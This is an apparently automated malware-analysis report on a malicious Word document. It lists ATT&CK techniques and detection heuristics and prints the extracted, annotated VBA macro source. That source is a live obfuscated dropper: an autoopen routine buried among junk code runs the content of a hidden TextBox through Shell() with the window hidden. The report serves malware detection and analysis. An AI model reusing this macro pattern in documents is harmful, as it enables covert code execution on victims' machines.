Verdict: MALICIOUS (Risk Score: 250)

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically an autoopen macro, which is a common technique for initial execution in malicious Office documents. The heuristics indicate a suspicious invocation of cmd.exe and a Shell() call within the VBA code, suggesting the macro is designed to execute external commands. This points towards a downloader or dropper functionality, where the macro likely initiates the download and execution of a second-stage payload.
Heuristics (8)
- ClamAV: Doc.Malware.Generic-6788310-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6788310-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `End Select z395718 = Array(A20750205, j4588397, A46205227, Interaction.Shell(Z031056708.TextBox1, 69 - 69), c88335538) Select Case h958`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() S79813691`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 5c4b7cfbd595aee1507861d04d67d45f99dedd7a7e21177f206dd4919da62be3) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5628 bytes |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "Z031056708"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' ThisDocument module; the embedded MSForms TextBox1 control holds the string later passed to Shell()
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
' Auto-execution entry point: runs when the document is opened and macros are enabled
Sub autoopen()
S79813691
End Sub
Attribute VB_Name = "z866180186"
Function S79813691()
' Errors are suppressed, so the junk Select Case blocks below (undeclared variables, meaningless arithmetic) never abort execution
On Error Resume Next
Select Case W3276
Case 68081738
F294 = I805
Z140 = Tan(c4733 - Round(G809) / 123649438 - Tan(A1283))
w4329 = H4888
m1787 = Round(B4020 * Chr(131013734))
Case 312971736
v6893 = N257
T612 = 328044188
T102 = w344
u0849 = Round(P766 + Tan(a4766 + Log(333818053) - O303 / Hex(325748759)))
End Select
Select Case w8779
Case 262644571
h4998 = a618
P644 = Tan(s140 - Round(E013) / 321089264 - Tan(I198))
R440 = z6041
T8322 = Round(Y9769 * Chr(88082470))
Case 189700160
o680 = d213
G0550 = 146940329
b346 = z836
B1652 = Round(a1491 + Tan(a635 + Log(98978097) - K210 / Hex(60633436)))
End Select
Select Case J750
Case 268883075
C7476 = K310
P337 = Tan(Z747 - Round(p502) / 156690829 - Tan(N3940))
r194 = j8270
D360 = Round(o2862 * Chr(180981459))
Case 84354809
W625 = A2741
L819 = 321079561
Z5949 = u0558
S1487 = Round(G6337 + Tan(Y8228 + Log(13602940) - S9071 / Hex(146836423)))
End Select
Select Case h445
Case 330353916
v641 = E5679
O831 = Tan(c7664 - Round(f0527) / 58365697 - Tan(B9090))
s5744 = M5337
V5198 = Round(W2395 * Chr(195916462))
Case 218271757
O970 = W972
t337 = 20826771
S795 = k732
V930 = Round(F7075 + Tan(O2398 + Log(105080981) - w5781 / Hex(13820794)))
End Select
' The only live statement: Shell() executes the text stored in TextBox1; 69 - 69 evaluates to 0 (vbHide), so the window is hidden
z395718 = Array(A20750205, j4588397, A46205227, Interaction.Shell(Z031056708.TextBox1, 69 - 69), c88335538)
Select Case h958
Case 67176432
C2507 = i052
R486 = Tan(X5659 - Round(c1247) / 176546356 - Tan(N714))
O9805 = v985
W186 = Round(U028 * Chr(282075463))
Case 109298656
U9482 = J5208
i961 = 53235108
z1178 = v029
t7803 = Round(E188 + Tan(b035 + Log(100020911) - s290 / Hex(333654878)))
End Select
Select Case h6887
Case 337232737
c617 = N5486
z520 = Tan(U5430 - Round(c5552) / 116080407 - Tan(h070))
d5989 = b1604
C977 = Round(M482 * Chr(263503429))
Case 335932151
N3222 = j515
d2768 = 241315718
N7125 = i648
I885 = Round(Z754 + Tan(Y4936 + Log(79252273) - Y776 / Hex(15777562)))
End Select
Select Case I080
Case 186255587
r582 = E2827
n105 = Tan(z7652 - Round(V546) / 340347001 - Tan(L000))
k6378 = u4868
W820 = Round(w1410 * Chr(147618097))
Case 13073995
p019 = L8514
H928 = 237234785
R972 = r9570
i7823 = Round(w986 + Tan(Q185 + Log(134770088) - n8847 / Hex(326148515)))
End Select
End Function
' Remaining modules are empty (randomly named padding modules with no code)
Attribute VB_Name = "b812926483"
Attribute VB_Name = "a5650599"
Attribute VB_Name = "X3072118"
Attribute VB_Name = "t7761097632"
Attribute VB_Name = "K8575164"
Attribute VB_Name = "X3822163149398"
Attribute VB_Name = "w6333953898"
Attribute VB_Name = "T299343986102"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "A07701028"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "o65332750841"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "L297348918018"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "U02376745493"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "W792180265380"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Q351969289168"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```